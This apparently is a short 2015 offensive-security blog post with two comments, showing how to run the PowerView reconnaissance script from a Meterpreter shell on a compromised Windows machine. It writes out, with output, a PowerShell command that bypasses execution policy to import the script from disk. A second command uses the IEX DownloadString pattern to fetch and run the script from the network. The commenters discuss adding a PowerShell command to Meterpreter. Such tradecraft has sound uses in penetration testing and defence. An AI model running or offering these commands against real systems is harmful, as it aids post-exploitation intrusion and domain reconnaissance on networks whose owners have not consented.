Monday, February 23, 2015

Running PowerShell Scripts That Require Module Imports With Meterpreter


Old post on the subject here:

http://carnal0wnage.attackresearch.com/2012/10/run-powershell-module-in-meterpreter.html

More recent posts on the subject by harmj0y

http://www.harmj0y.net/blog/powershell/derbycon-powershell-weaponization/


Anyway, #2 from The PowerShell Weaponization Problem works ok if you don't care about the code being on disk

Gist with the command

meterpreter > shell
Process 2380 created.
Channel 4 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Users\user\Desktop>powershell.exe -exec bypass -Command "& {Import-Module 'C:\Users\user\Desktop\PowerTools\PowerView\powerview.ps1'; Get-NetDomain}"
powershell.exe -exec bypass -Command "& {Import-Module 'C:\Users\user\Desktop\PowerTools\PowerView\powerview.ps1'; Get-NetDomain}"
UNLUCKYCOMPANY.COM
C:\Users\user\Desktop>


Via IEX download method: Gist with the command

C:\Users\user\Desktop>powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Veil-Framework/PowerTools/master/PowerView/powerview.ps1'); Get-NetDomain"
powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Veil-Framework/PowerTools/master/PowerView/powerview.ps1'); Get-NetDomain"
UNLUCKYCOMPANY.COM

C:\Users\user\Desktop>
CG

2 comments:

OJ said...

Executing Powershell through Meterpreter is a hot discussion topic at the moment. A few people are pondering options and I'm playing with a couple of ideas to make this a little nicer. It might be nice to have a command that sits alongside "shell" which is called "powershell" that just gives you an interactive PS prompt. This might have to be done via a new extension though, given that it'd probably require automation of PS rather than shelling out to it and mucking with std handles.

So watch this space!

CG said...

yes plz :-)